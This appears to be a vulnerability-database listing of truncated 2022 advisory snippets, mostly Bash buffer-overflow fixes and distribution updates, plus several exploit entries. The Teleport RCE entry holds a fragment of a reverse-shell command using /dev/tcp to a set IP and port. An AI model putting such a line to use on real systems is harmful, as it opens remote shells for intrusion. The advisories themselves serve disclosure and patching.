Azure CLI Code Injection CVE-2022-39327 hits 9.8/10 CVSS score

The most recent Azure CLI Code Injection vulnerability is a rare and dangerous case. It’s not often that the most popular cloud platform client is vulnerable to such critical issues as code injection. Regardless overall high risk of injections by OWASP Top 10 and OWASP API Security Top 10, code...

CVE-2022-3715

A flaw was found in the bash package, where a heap-buffer overflow can occur in validparametertransform. This issue may lead to memory problems...

Bash 缓冲区错误漏洞

Bash is an American shell command language interpreter written for the GNU Project and running on Unix-like operating systems by the individual developer Brian J. Fox. It is capable of reading and executing commands from standard input devices or files. A buffer error vulnerability exists in Bash...

PT-2022-5389 · Bash +6 · Bash +6

Name of the Vulnerable Software and Affected Versions: bash affected versions not specified Description: The issue is related to a heap-buffer overflow in the valid parameter transform function of the bash package, which can lead to memory problems. This can potentially allow a remote attacker to...

Exploit for Improper Initialization in Linux Linux_Kernel

!Dirty Pipehttps://forum.hackersploit.org/uploads/default/ori...

EulerOS Virtualization 3.0.6.0 : git (EulerOS-SA-2022-2559)

According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machine...

EulerOS Virtualization 3.0.6.6 : git (EulerOS-SA-2022-2500)

According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machine...

Arsenal - Recon Tool installer

Arsenal is a Simple shell script Bash used to install the most important tools and requirements for your environment and save time in installing all these tools. Tools in Arsenal Name | description ---|--- Amass | The OWASP Amass Project performs network mapping of attack surfaces and external...

Mageia: Security Advisory (MGASA-2022-0358)

The remote host is missing an update for the SPDX-FileCopyrightText: 2022 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Updated bash packages fix security vulnerability

Bash has been updated to version 5.1.16 using a patch from Fedora to fix a security issue by adding a null check in the parameterbracetransform function...

MGASA-2022-0358 Updated bash packages fix security vulnerability

Bash has been updated to version 5.1.16 using a patch from Fedora to fix a security issue by adding a null check in the parameterbracetransform function...

[SECURITY] Fedora 35 Update: bash-5.1.8-3.fc35

The GNU Bourne Again shell Bash is a shell or command language interpreter that is compatible with the Bourne shell sh. Bash incorporates useful features from the Korn shell ksh and the C shell csh. Most sh scripts can be run by bash without modification...

Fedora: Security Advisory for bash (FEDORA-2022-5b644a935b)

The remote host is missing an update for the SPDX-FileCopyrightText: 2022 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

PT-2022-37578 · Bash · Bash

Name of the Vulnerable Software and Affected Versions: Bash versions prior to 5.1.16 Description: A security issue was fixed in Bash by adding a null check in the parameter brace transform function. Recommendations: For versions prior to 5.1.16, update to version 5.1.16 to resolve the issue...

Fedora: Security Advisory for bash (FEDORA-2022-4ff296fe8e)

The remote host is missing an update for the SPDX-FileCopyrightText: 2022 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Fedora: Security Advisory for bash (FEDORA-2022-bf387ff344)

The remote host is missing an update for the SPDX-FileCopyrightText: 2022 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

CVE-2022-40929

XXL-JOB 2.2.0 has a Command execution vulnerability in background tasks. NOTE: this is disputed because the issues/4929 report is about an intended and supported use case running arbitrary Bash scripts on behalf of users...

PT-2022-25627 · Xxl-Job · Xxl-Job

Name of the Vulnerable Software and Affected Versions: XXL-JOB versions 2.2.0 and prior Description: The issue concerns a Command execution vulnerability in background tasks, which is disputed as it may be an intended use case for running arbitrary Bash scripts on behalf of users. Recommendations...

Teleport 10.1.1 Remote Code Execution

Exploit Title: Teleport v10.1.1 - Remote Code Execution RCE Date: 08/01/2022 Exploit Author: Brandon Roach & Brian Landrum Vendor Homepage: https://goteleport.com Software Link: https://github.com/gravitational/teleport Version: /dev/tcp/10.0.0.1/5555 0&1...

Exploit for Argument Injection in Atlassian Bitbucket

CVE-2022-36804-PoC Multithreaded exploit script for CVE-2022-3...